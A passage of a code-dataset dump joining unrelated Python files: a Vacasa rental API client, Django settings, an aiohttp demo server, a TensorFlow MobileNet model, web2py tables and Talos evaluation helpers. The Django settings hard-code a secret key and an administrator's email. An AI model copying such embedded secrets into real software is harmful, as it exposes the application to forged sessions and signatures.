r.raise_for_status()\n\n return r\n\n def _get(self, url, headers: dict = None, params: dict = None, retry: bool = True):\n \"\"\"HTTP Get helper with optional retrying.\"\"\"\n if retry:\n return retry_call(\n self.__get,\n fargs=[url, headers, params],\n exceptions=requests.exceptions.RequestException,\n tries=5,\n delay=1,\n backoff=2\n )\n else:\n return self.__get(url, headers, params)\n\n @staticmethod\n def _post(url, data: dict = None, json: dict = None, headers: dict = None):\n \"\"\"HTTP POST request helper.\"\"\"\n if not headers:\n headers = {}\n\n r = requests.post(url, data=data, json=json, headers=headers)\n r.raise_for_status()\n\n return r\n\n def _ensure_url_has_host(self, url: str):\n \"\"\"Insurance against the API returning a URL that lacks a host name\"\"\"\n parsed_url = urlparse(url)\n\n if not parsed_url.hostname:\n valid_host = urlparse(self.endpoint).hostname\n parsed_url = parsed_url._replace(netloc=valid_host)\n return urlunparse(parsed_url)\n\n return url\n\n def _iterate_pages(self, url: str, headers: dict, params: dict = None):\n \"\"\"Iterate over paged results.\"\"\"\n more_pages = True\n\n while more_pages:\n r = self._get(url, headers=headers, params=params)\n yield from r.json()['data']\n\n if r.json().get('links').get('next'):\n more_pages = True\n url = self._ensure_url_has_host(r.json()['links']['next'])\n else:\n more_pages = False\n\n @staticmethod\n def _add_meta_param(params: dict, meta_value: str) -> dict:\n \"\"\"Add to the include_meta comma-delimited string parameter.\"\"\"\n meta_param = params.get('include_meta', '')\n # A leading comma is ignored by the connect api\n meta_param += f\",{meta_value}\"\n params['include_meta'] = meta_param\n\n return params\n\n @staticmethod\n def _add_include_param(params: dict, include_value: str) -> dict:\n \"\"\"Add to the include_meta comma-delimited string parameter.\"\"\"\n include_param = params.get('include', '')\n if include_param:\n include_param += \",\"\n include_param += f\"{include_value}\"\n params['include'] = include_param\n\n return 
params\n\n def get(self, uri, params: dict = None):\n url = f\"{self.endpoint}/v1/{uri}\"\n r = self._get(url, headers=self._headers(), params=params)\n\n return r.json()\n\n def get_units(self,\n params: dict = None,\n include_photos: bool = False,\n include_terminated: bool = False,\n include_amenities: bool = False\n ):\n \"\"\"Retrieve multiple units.\n\n Args:\n params: A dict containing a key for each query string parameter\n with a corresponding value. See https://connect.vacasa.com/\n for more detail.\n include_photos: Whether or not to include a list of photo URLs with\n each unit.\n include_terminated: Whether or not to include units that are\n currently terminated or pending termination.\n include_amenities: Whether or not to include key/values of each\n amenity with each unit.\n\n Yields:\n An iterator of units. Each unit is a dict.\n \"\"\"\n if params is None:\n params = {}\n\n if include_photos:\n params = self._add_meta_param(params, 'photos_list')\n\n if include_amenities:\n params = self._add_meta_param(params, 'amenities_map')\n\n if not include_terminated:\n params['filter[terminated]'] = 0\n\n url = f\"{self.endpoint}/v1/units\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_unit_by_id(self, unit_id: int, params: dict = None) -> dict:\n \"\"\"Retrieve a single unit by its primary identifier.\n\n Args:\n unit_id: The unique identifier for the individual unit.\n params: A dict containing a key for each query string parameter\n with a corresponding value. See https://connect.vacasa.com/\n for more detail.\n\n Returns:\n A dict containing attributes about the individual unit.\n \"\"\"\n url = f\"{self.endpoint}/v1/units/{unit_id}\"\n r = self._get(url, headers=self._headers(), params=params)\n\n return r.json()['data']\n\n def get_availability(self, params: dict = None):\n \"\"\"Retrieve availabilities.\n\n Args:\n params: A dict containing a key for each query string parameter\n with a corresponding value. See https://connect.vacasa.com/\n for more detail.\n\n Yields:\n An iterator of availabilities. Each availability is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/availability\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_availability_by_id(self, unit_id: int, params: dict = None):\n \"\"\"Retrieve availabilities for a single unit.\n\n Args:\n unit_id: The unique identifier for the individual unit.\n params: A dict containing a key for each query string parameter\n with a corresponding value. See https://connect.vacasa.com/\n for more detail.\n\n Yields:\n An iterator of availabilities. Each availability is a dict.\n \"\"\"\n if params is None:\n params = {}\n params['filter[unit_id]'] = unit_id\n\n return self.get_availability(params)\n\n def get_amenities(self,\n params: dict = None,\n include_categories: bool = False,\n include_content: bool = False,\n include_options: bool = False\n ):\n \"\"\"Retrieve a master list of all amenities\n\n Yields:\n An iterator of amenities. 
Each amenity is a dict.\n \"\"\"\n if params is None:\n params = {}\n\n url = f\"{self.endpoint}/v1/amenities\"\n headers = self._headers()\n\n if include_categories:\n params = self._add_include_param(params, 'categories')\n\n if include_content:\n params = self._add_include_param(params, 'content')\n\n if include_options:\n params = self._add_include_param(params, 'options')\n\n return self._iterate_pages(url, headers, params)\n\n def get_amenities_groups(self, params: dict = None):\n \"\"\"Retrieve a list of amenity groups\n\n Yields:\n An iterator of amenity groups. Each amenity group is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/amenities-groups\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_unit_amenities(self, params: dict = None):\n \"\"\"Retrieve a list of all amenities for all units\n\n Yields:\n An iterator of unit amenities. Each unit amenity is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/unit-amenities\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_unit_amenities_reduced(self, params: dict = None):\n \"\"\"Retrieve a smaller subset of amenity attributes for all units\n\n Yields:\n An iterator of unit amenities. Each unit amenity is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/unit-amenities-reduced\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_cities(self, params: dict = None):\n \"\"\"Retrieve a list of all cities\n\n Yields:\n An iterator of cities. Each city is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/cities\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_states(self, params: dict = None):\n \"\"\"Retrieve a list of all states\n\n Yields:\n An iterator of states. Each state is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/states\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_countries(self, params: dict = None):\n \"\"\"Retrieve a list of all countries\n\n Yields:\n An iterator of countries. Each country is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/countries\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_destinations(self, params: dict = None):\n \"\"\"Retrieve a list of all destinations\n\n Yields:\n An iterator of destinations. Each destination is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/destinations\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_regions(self, params: dict = None):\n \"\"\"Retrieve a list of all regions\n\n Yields:\n An iterator of regions. Each region is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/regions\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_region_phones(self, params: dict = None):\n \"\"\"Retrieve a list of all region-phones\n\n Yields:\n An iterator of region-phones. Each region-phone is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/region-phones\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_region_cities(self, params: dict = None):\n \"\"\"Retrieve a list of region-cities\n\n Yields:\n An iterator of region-cities. 
Each region-city is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/region-cities\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_guarantees(self, params: dict = None):\n \"\"\"Retrieve a list of guarantees\n\n Yields:\n An iterator of guarantees. Each guarantee is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/guarantees\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_guarantee_dates(self, params: dict = None):\n \"\"\"Retrieve a list of guarantee_dates\n\n Yields:\n An iterator of guarantee_dates. Each guarantee_date is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/guarantee-dates\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_reviews(self, params: dict = None):\n \"\"\"Retrieve a list of reviews\n\n Yields:\n An iterator of reviews. Each review is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/reviews\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_reservations(self, params: dict = None):\n \"\"\"Retrieve a list of reservations\n\n Yields:\n An iterator of reservations. Each reservation is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/reservations\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_offices(self, params: dict = None):\n \"\"\"Retrieve a list of Vacasa local office locations\n\n Yields:\n An iterator of office locations. Each office location is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/offices\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n @staticmethod\n def _trip_protection_to_integer(trip_protection: bool) -> int:\n \"\"\"Convert from True/False/None to 1/0/-1\"\"\"\n if trip_protection is None:\n return 0\n return 1 if trip_protection else -1\n\n def get_quote(self,\n unit_id: int,\n arrival: str,\n departure: str,\n adults: int,\n children: Optional[int] = 0,\n pets: Optional[int] = 0,\n trip_protection: Optional[bool] = None,\n discount_id: Optional[int] = None,\n language=None,\n currency=None\n ) -> dict:\n \"\"\" Get a price quote for a given stay\n\n Args:\n unit_id: A Vacasa Unit ID\n arrival: Checkin date in 'YYYY-MM-DD' format\n departure: Checkout date in 'YYYY-MM-DD' format\n adults: How many adults will be staying\n children: How many children will be staying\n pets: How many pets will be staying\n trip_protection: Has the user requested trip protection?\n -1 No\n 0 TBD\n 1 Yes\n discount_id: optional\n language: e.g. 'en-US' or 'es-ES' (optional)\n currency: e.g. 
'USD' or 'EUR' (optional)\n\n Returns: dict\n\n \"\"\"\n url = f\"{self.endpoint}/v1/quotes\"\n headers = self._headers(language, currency)\n\n params = {\n 'adults': adults,\n 'children': children,\n 'pets': pets,\n 'unit_id': unit_id,\n 'arrival': arrival,\n 'departure': departure,\n }\n\n if discount_id is not None:\n params['discount_id'] = discount_id\n\n params['trip_protection'] = self._trip_protection_to_integer(trip_protection)\n\n return self._get(url, headers, params, retry=False).json()\n\n def create_reservation(self,\n unit_id: int,\n arrival: str,\n departure: str,\n email: str,\n address: dict,\n adults: int,\n quote_id: str,\n first_name: str,\n last_name: str,\n account_number: str,\n exp_mmyy: str,\n cvv: Optional[str] = None,\n phone: Optional[str] = None,\n children: int = 0,\n pets: int = 0,\n trip_protection: Optional[bool] = None,\n source: Optional[str] = None,\n ) -> dict:\n \"\"\" Reserve a given unit\n\n Arguments:\n unit_id: A Vacasa Unit ID\n arrival: Checkin date in 'YYYY-MM-DD' format\n departure: Checkout date in 'YYYY-MM-DD' format\n email: User's email address\n phone: User's phone number\n address: User's address information, e.g.\n {\n 'address_1': '999 W Main St #301',\n 'city': 'Boise',\n 'state': 'ID',\n 'zip': '83702'\n }\n adults: How many adults will be staying\n children: How many children will be staying\n pets: How many pets will be staying\n trip_protection: Has the user requested trip protection?\n -1 No\n 0 TBD\n 1 Yes\n quote_id: ID of a quote retrieved from the `GET /quotes` endpoint\n first_name: User's First Name (for billing)\n last_name: User's Last Name (for billing)\n account_number: Credit card #\n exp_mmyy: Credit card expiry in `mmyy` format\n cvv: Card verification value on credit card\n source: A Vacasa-issued code identifying the source of this request\n\n Returns: dict\n\n \"\"\"\n\n url = f\"{self.endpoint}/v1/reservations\"\n headers = self._headers()\n payload = {\n 'unit_id': unit_id,\n 'arrival': arrival,\n 'departure': departure,\n 'email': email,\n 'phone': phone,\n 'address': address,\n 'adults': adults,\n 'children': children,\n 'pets': pets,\n 'trip_protection': trip_protection,\n 'quote_id': quote_id,\n 'first_name': first_name,\n 'last_name': last_name,\n 'account_number': account_number,\n 'exp_mmyy': exp_mmyy,\n 'source': source,\n }\n\n if phone is not None:\n payload['phone'] = phone\n\n payload['trip_protection'] = self._trip_protection_to_integer(trip_protection)\n\n if source is not None:\n payload['source'] = source\n\n if cvv:\n payload['cvv'] = str(cvv)\n\n return self._post(url, json={'data': {'attributes': payload}}, headers=headers).json()\n","sub_path":"vacasa/connect/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":21902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"275305171","text":"# -*- coding: utf-8 -*-\r\n\"\"\" =================================================\r\n -- file: translations/settings/base_settings.py\r\n -- site: Translations\r\n================================================= \"\"\"\r\n### -------------- Python packages -------------- ###\r\nimport os\r\n### -------------- Django packages -------------- ###\r\nfrom django.conf import global_settings\r\n### ----------- Third party packages ------------ ###\r\n### ----------- External app packages ----------- ###\r\n### ---------------- App packages --------------- ###\r\n\r\n\"\"\"======================= FILE PATH HELPERS 
========================\"\"\"\r\n# here() gives us file paths from the root of the system to the directory holding the current file.\r\nhere = lambda * x: os.path.join(os.path.abspath(os.path.dirname(__file__)), *x)\r\n\r\n# Define project root\r\nPROJECT_ROOT = here(\"..\", \"..\")\r\n\r\n# root() gives us file paths from the root of the system to whatever\r\n# folder(s) we pass it starting at the parent directory of the current file.\r\nroot = lambda * x: os.path.join(os.path.abspath(PROJECT_ROOT), *x)\r\n\r\n\"\"\"======================= ADMINISTRATORS ========================\"\"\"\r\nADMINS = (\r\n ('Laszlo Bekessy', 'laszlo.bekessy@gmail.com'),\r\n)\r\nMANAGERS = ADMINS\r\n\r\n\"\"\"======================= SECRET KEY ========================\"\"\"\r\nSECRET_KEY = 'lq&9y*56qvc0!qns=h0-2@@%%r5pmqg7$*8)fd)fa@w0e4=p8y'\r\n\r\n\"\"\"======================= TIMEZONE AND LANGUAGES ========================\"\"\"\r\nTIME_ZONE = 'Europe/Budapest'\r\nUSE_TZ = True\r\nUSE_I18N = True\r\nUSE_L10N = True\r\nLOCALE_PATHS = (\r\n root(\"locale\"),\r\n)\r\n\r\n\"\"\"======================= MEDIA ROOT AND URL ========================\"\"\"\r\nMEDIA_ROOT = root(\"uploads\")\r\nMEDIA_URL = '/uploads/'\r\n\r\n\"\"\"======================= STATIC AND TEMPLATE RELATED ========================\"\"\"\r\nSTATIC_ROOT = root(\"static\")\r\nSTATIC_URL = '/static/'\r\nSTATICFILES_DIRS = (\r\n root(\"assets\"),\r\n)\r\n\r\nSTATICFILES_FINDERS = (\r\n 'django.contrib.staticfiles.finders.FileSystemFinder',\r\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\r\n 'dajaxice.finders.DajaxiceFinder',\r\n)\r\n\r\nTEMPLATES = [\r\n {\r\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\r\n 'DIRS': [],\r\n 'APP_DIRS': True,\r\n 'OPTIONS': {\r\n 'context_processors': [\r\n 'django.template.context_processors.debug',\r\n 'django.template.context_processors.request',\r\n 'django.contrib.auth.context_processors.auth',\r\n 'django.contrib.messages.context_processors.messages',\r\n 'social.apps.django_app.context_processors.backends',\r\n 'social.apps.django_app.context_processors.login_redirect',\r\n 'translations.processor.global_context',\r\n ],\r\n },\r\n },\r\n]\r\n\r\n\"\"\"======================= MIDDLEWARES ========================\"\"\"\r\nMIDDLEWARE_CLASSES = (\r\n 'django.contrib.sessions.middleware.SessionMiddleware',\r\n 'django.middleware.locale.LocaleMiddleware',\r\n 'django.middleware.common.CommonMiddleware',\r\n 'django.middleware.csrf.CsrfViewMiddleware',\r\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\r\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\r\n 'django.contrib.messages.middleware.MessageMiddleware',\r\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\r\n 'django.middleware.security.SecurityMiddleware',\r\n 'translations.middleware.TranslationsMiddleware',\r\n 'translations.middleware.SocialAuthCancelMiddleware'\r\n)\r\n\r\n\"\"\"======================= APPS ========================\"\"\"\r\nLOCAL_APPS = (\r\n 'translations',\r\n 'projects',\r\n)\r\n\r\nTHIRD_PARTY_APPS = (\r\n 'dajaxice',\r\n 'grappelli',\r\n 'rosetta',\r\n 'intercom',\r\n 'social.apps.django_app.default',\r\n)\r\n\r\nDJANGO_APPS = (\r\n 'django.contrib.admin',\r\n 'django.contrib.auth',\r\n 'django.contrib.contenttypes',\r\n 'django.contrib.sessions',\r\n 'django.contrib.sites',\r\n 'django.contrib.messages',\r\n 'django.contrib.staticfiles',\r\n)\r\n\r\n# Don't change the order, otherwise grappelli doesn't work\r\nINSTALLED_APPS = LOCAL_APPS + THIRD_PARTY_APPS + 
DJANGO_APPS\r\n\r\n\"\"\"======================= BASE CONFIG ========================\"\"\"\r\nROOT_URLCONF = 'translations.urls'\r\nWSGI_APPLICATION = 'wsgi.wsgi.application'\r\nDEFAULT_CHARSET = 'utf-8'\r\n\r\n\"\"\"======================= AUTH RELATED ========================\"\"\"\r\nAUTHENTICATION_BACKENDS = (\r\n 'social.backends.facebook.FacebookOAuth2',\r\n 'social.backends.google.GoogleOAuth2',\r\n 'django.contrib.auth.backends.ModelBackend',\r\n)\r\n\r\nLOGIN_URL = '/'\r\nLOGIN_ERROR_URL = '/'\r\nSOCIAL_AUTH_LOGIN_REDIRECT_URL = '/user_setup'\r\nSOCIAL_AUTH_USER_MODEL = 'auth.User'\r\nSOCIAL_AUTH_ADMIN_USER_SEARCH_FIELDS = ['username', 'first_name', 'email']\r\n\r\n\"\"\"======================= LOGGING ========================\"\"\"\r\nLOGGING = {\r\n 'version': 1,\r\n 'disable_existing_loggers': True,\r\n 'formatters': {\r\n 'standard': {\r\n 'format': \"{\"\r\n \"\\\"time\\\": \\\"%(asctime)s\\\", \"\r\n \"\\\"level\\\": \\\"%(levelname)s\\\", \"\r\n \"\\\"message\\\": \\\"%(message)s\\\"}\",\r\n 'datefmt': \"%d/%b/%Y-%H:%M:%S\"\r\n },\r\n },\r\n 'filters': {\r\n 'require_debug_false': {\r\n '()': 'django.utils.log.RequireDebugFalse'\r\n }\r\n },\r\n 'handlers': {\r\n 'null': {\r\n 'level':'DEBUG',\r\n 'class':'django.utils.log.NullHandler',\r\n },\r\n 'logfile': {\r\n 'level':'INFO',\r\n 'class':'logging.handlers.RotatingFileHandler',\r\n 'filename': root(\"logs\") + \"/logfile.log\",\r\n 'maxBytes': 5000000,\r\n 'backupCount': 25,\r\n 'formatter': 'standard',\r\n },\r\n 'console':{\r\n 'level':'INFO',\r\n 'class':'logging.StreamHandler',\r\n 'formatter': 'standard'\r\n },\r\n 'mail_admins': {\r\n 'level': 'ERROR',\r\n 'filters': ['require_debug_false'],\r\n 'class': 'django.utils.log.AdminEmailHandler'\r\n }\r\n },\r\n 'loggers': {\r\n 'django': {\r\n 'handlers':['console'],\r\n 'propagate': True,\r\n 'level':'WARN',\r\n },\r\n 'django.request': {\r\n 'handlers': ['mail_admins'],\r\n 'level': 'ERROR',\r\n 'propagate': False,\r\n },\r\n 'django.db.backends': {\r\n 'handlers': ['console'],\r\n 'level': 'DEBUG',\r\n 'propagate': False,\r\n },\r\n 'translations': {\r\n 'handlers': ['logfile'],\r\n 'level': 'INFO',\r\n },\r\n }\r\n}\r\n\r\n\"\"\"======================= TESTING ========================\"\"\"\r\nTEST_RUNNER = 'django.test.runner.DiscoverRunner'\r\n","sub_path":"translations/settings/base_settings.py","file_name":"base_settings.py","file_ext":"py","file_size_in_byte":6763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"516245076","text":"from aiohttp import web\n\n# describes routes by decorators\nroutes = web.RouteTableDef()\n\n# for localhost:8080/ -->\n# Async Server in Python 3.7\n@routes.get('/')\nasync def handler(request):\n return web.Response(text='Async Server in Python 3.7')\n\n\n# for localhost:8080/Java -->>\n# The programming language entered was: Java\n@routes.get('/{language}')\nasync def return_language(request):\n lang = request.match_info.get('language', '')\n return web.Response(text=f'The programming language entered was: {lang}')\n\n# another way to pass info with url is to pass key-value pairs\n# for localhost:8080/Java?other=what -->>\n# The programming language entered was: Java\n# Other info: what\n@routes.get('/ok/{language}')\nasync def return_language(request):\n lang = request.match_info.get('language', '')\n other_info = request.rel_url.query.get('other', '')\n return web.Response(text=f'''\n The programming language entered was: {lang}\n Other info: {other_info}\n 
''')\n\n\n@routes.post('/add_lang')\nasync def add_lang(request):\n print(\"hello\")\n data = await request.post()\n lang = data.get('language')\n return web.Response(text=f'{lang} was added to database')\n\n\nasync def initialization():\n app = web.Application()\n app.add_routes(routes)\n return app\n\n\n# app = web.Application()\n# # this way async functions can be plugged in to the web application\n# app.add_routes([web.get('/', handler)])\n# # alternative way to register routes is to use decorators and add them\n# at the start of handler coroutines\n# web.run_app(app)\nweb.run_app(initialization())\n","sub_path":"src/async-sync/async-client-server/async-server.py","file_name":"async-server.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"403729475","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\n\nclass MobileNet:\n\t\"\"\"\n\tThis is the MobileNet main class which will be used to do the image classification\n\t\"\"\"\n\n\tdef __init__(self, input, trainable):\n\t\tself.input = input\n\t\tself.trainable = trainable\n\t\tself.outputs = self.__build_network__()\n\n\tdef separable_conv_block(self, input, dw_filter, output_channel, strides, name):\n\t\t\"\"\"\n\t\tThis method defines the structure for one downsample of the input\n\t\t:param input: The input to the unit\n\t\t:param dw_filter: The size of the filter\n\t\t:param output_channel: The number of channels in output\n\t\t:param strides: The stride of the filter\n\t\t:param name: The name of the layer\n\t\t:return: The output after the layer\n\t\t\"\"\"\n\t\twith tf.variable_scope(name):\n\t\t\t# We firstly find the weights for the layer by random initialization\n\t\t\tdepthwise_weight = tf.get_variable(name = 'dw_filter', dtype = tf.float32, trainable = True,\n\t\t\t shape = dw_filter,\n\t\t\t initializer = tf.random_normal_initializer(stddev = 0.01))\n\t\t\t# Here we find the output of the depthwise convolution\n\t\t\tdepthwise_output = tf.nn.depthwise_conv2d(input = input, filter = depthwise_weight, strides = strides,\n\t\t\t padding = \"SAME\", name = 'Conv/depthwise_output')\n\t\t\t# Now we do the batch_wise normalization of the output to reduce effect of exploding and diminishing\n\t\t\t# gradient\n\t\t\tbatch_normalization_depthwise = tf.layers.batch_normalization(depthwise_output,\n\t\t\t beta_initializer = tf.zeros_initializer(),\n\t\t\t gamma_initializer = tf.ones_initializer(),\n\t\t\t moving_mean_initializer =\n\t\t\t tf.zeros_initializer(),\n\t\t\t moving_variance_initializer =\n\t\t\t tf.ones_initializer(),\n\t\t\t training = self.trainable,\n\t\t\t name = 'depthwise_output/bn')\n\t\t\t# Now we take the rectified Linear Unit activation of the output\n\t\t\trelu = tf.nn.leaky_relu(batch_normalization_depthwise, 0.1)\n\t\t\t# Now we get the weight for the 2d convolution\n\t\t\tweight = tf.get_variable(name = 'weight', dtype = tf.float32, trainable = True,\n\t\t\t shape = (1, 1, dw_filter[2] * dw_filter[3], output_channel),\n\t\t\t initializer = tf.random_normal_initializer(stddev = 0.01))\n\n\t\t\tconv = tf.nn.conv2d(input = relu, filter = weight, strides = [1, 1, 1, 1], padding = \"SAME\",\n\t\t\t name = \"conv/s1\")\n\t\t\tbatch_normalization_2d_conv = tf.layers.batch_normalization(conv, beta_initializer =\n\t\t\ttf.zeros_initializer(),\n\t\t\t gamma_initializer = tf.ones_initializer(),\n\t\t\t moving_mean_initializer 
=\n\t\t\t tf.zeros_initializer(),\n\t\t\t moving_variance_initializer =\n\t\t\t tf.ones_initializer(),\n\t\t\t training = self.trainable,\n\t\t\t name = 'pt/bn')\n\t\t\treturn tf.nn.leaky_relu(batch_normalization_2d_conv, 0.1)\n\n\tdef __build_network__(self):\n\t\t\"\"\"\n\t\tThis function helps to build the network\n\t\t:return: The values of the output\n\t\t\"\"\"\n\t\twith tf.variable_scope('MobileNet'):\n\t\t\tconvolution_1 = tf.layers.conv2d(self.input,\n\t\t\t filters = 32,\n\t\t\t kernel_size = (3, 3),\n\t\t\t strides = (2, 2),\n\t\t\t padding = 'same',\n\t\t\t activation = tf.nn.relu,\n\t\t\t name = 'convolution_1'\n\t\t\t )\n\t\t\tbatch_normalized_output_1 = tf.layers.batch_normalization(convolution_1,\n\t\t\t beta_initializer = tf.zeros_initializer(),\n\t\t\t gamma_initializer = tf.ones_initializer(),\n\t\t\t moving_mean_initializer = tf.zeros_initializer(),\n\t\t\t moving_variance_initializer =\n\t\t\t tf.ones_initializer(),\n\t\t\t training = self.trainable,\n\t\t\t name = 'bn')\n\t\t\tx = self.separable_conv_block(input = batch_normalized_output_1, dw_filter = (3, 3, 32, 1),\n\t\t\t output_channel = 64,\n\t\t\t strides = (1, 1, 1, 1), name = \"downsample_1\")\n\n\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 64, 1), output_channel = 128,\n\t\t\t strides = (1, 2, 2, 1), name = \"downsample_2\")\n\n\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 128, 1), output_channel = 128,\n\t\t\t strides = (1, 1, 1, 1), name = \"downsample_3\")\n\n\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 128, 1), output_channel = 256,\n\t\t\t strides = (1, 2, 2, 1), name = \"downsample_4\")\n\n\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 256, 1), output_channel = 256,\n\t\t\t strides = (1, 1, 1, 1), name = \"downsample_5\")\n\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 256, 1), output_channel = 512,\n\t\t\t strides = (1, 2, 2, 1), name = \"downsample_6\")\n\n\t\t\tfor i in range(5):\n\t\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 512, 1), output_channel = 512,\n\t\t\t\t strides = (1, 1, 1, 1), name = \"downsample_%d\" % (i + 7))\n\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 512, 1), output_channel = 1024,\n\t\t\t strides = (1, 2, 2, 1), name = \"downsample_12\")\n\n\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 1024, 1), output_channel = 1024,\n\t\t\t strides = (1, 1, 1, 1), name = \"downsample_13\")\n\t\treturn x\n","sub_path":"mobilenet.py","file_name":"mobilenet.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"422019185","text":"db = DAL('sqlite://storage.sqlite')\nfrom gluon.tools import Auth\nauth = Auth(db) #secure=True\nauth.define_tables(username=True)\n\n#db.auth_user.password.requires=IS_STRONG()\n#fr#om gluon.tools import Recaptcha\n#auth.settings.captcha = Recaptcha(request,\n # '6LcD0PESAAAAAAv8xXDZS_g39KeqDKVhdpw5Ui3B',\n # '6LcD0PESAAAAACBYOTT1juQXfClchb_QP8BuXCOZ')\n\ndb.define_table('Restaurants',\n Field('name','string',required=True,requires=IS_LOWER()), \n Field('area',required=True,requires=IS_LOWER()),\n Field('city',required=True,requires=IS_LOWER()),\n Field('address','string',requires=IS_NOT_EMPTY()),\n Field('cuisine','string',requires=IS_NOT_EMPTY()), \n Field('comments'),\n 
Field('images','upload'))\n\ndb.Restaurants.name.requires=IS_NOT_EMPTY()\ndb.Restaurants.area.requires=IS_NOT_EMPTY()\ndb.Restaurants.city.requires=IS_NOT_EMPTY()\n\ndb.define_table('Comments',Field('comment','string',requires=IS_NOT_EMPTY()),\n Field('user','string',readable=False,writable=False),\n Field('rid','integer',readable=False,writable=False),\n Field('table_name','string',readable=False,writable=False))\n\ndb.define_table('Images',\n Field('image','upload',requires=IS_NOT_EMPTY()),\n Field('user','string',readable=False,writable=False),\n Field('rid','integer',readable=False,writable=False))\n\ndb.define_table('Movie_Halls',\n Field('name','string',required=True,requires=IS_LOWER()),\n Field('area',required=True,requires=IS_LOWER()),\n Field('city','string',required=True,requires=IS_LOWER()),\n Field('comments','string'),\n Field('location','string',required=True,requires=IS_NOT_EMPTY()),\n Field('images','upload'))\n\ndb.Movie_Halls.name.requires=IS_NOT_EMPTY()\ndb.Movie_Halls.area.requires=IS_NOT_EMPTY()\ndb.Movie_Halls.city.requires=IS_NOT_EMPTY()\n\n","sub_path":"BKG/models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"627895810","text":"# for func_best_model\nfrom ..utils.best_model import best_model, activate_model\n\n# for func_evaluate\nimport warnings\nfrom tqdm import tqdm\nfrom numpy import mean, std\nimport numpy as np\n\nfrom ..commands.evaluate import Evaluate\n\n\ndef func_best_model(scan_object, metric='val_acc', asc=False):\n\n '''Picks the best model based on a given metric and\n returns the index number for the model.\n\n NOTE: for loss 'asc' should be True'''\n\n warnings.simplefilter('ignore')\n\n model_no = best_model(scan_object, metric, asc)\n out = activate_model(scan_object, model_no)\n\n return out\n\n\ndef func_evaluate(scan_object,\n x_val,\n y_val,\n n=10,\n metric='val_acc',\n folds=5,\n shuffle=True,\n average='binary',\n asc=False):\n\n '''\n For creating scores from kfold cross-evaluation and\n adding them to the data frame.\n\n '''\n\n warnings.simplefilter('ignore')\n\n picks = scan_object.data.sort_values(metric,\n ascending=asc).index.values[:n]\n\n if n > len(scan_object.data):\n data_len = len(scan_object.data)\n else:\n data_len = n\n\n out = []\n\n pbar = tqdm(total=data_len)\n\n for i in range(len(scan_object.data)):\n\n if i in list(picks):\n evaluate_object = Evaluate(scan_object)\n temp = evaluate_object.evaluate(x_val, y_val,\n model_id=i,\n metric=metric,\n folds=folds,\n shuffle=shuffle,\n asc=asc)\n out.append([mean(temp), std(temp)])\n pbar.update(1)\n else:\n out.append([np.nan, np.nan])\n\n pbar.close()\n\n scan_object.data['eval_f1score_mean'] = [i[0] for i in out]\n scan_object.data['eval_f1score_std'] = [i[1] for i in 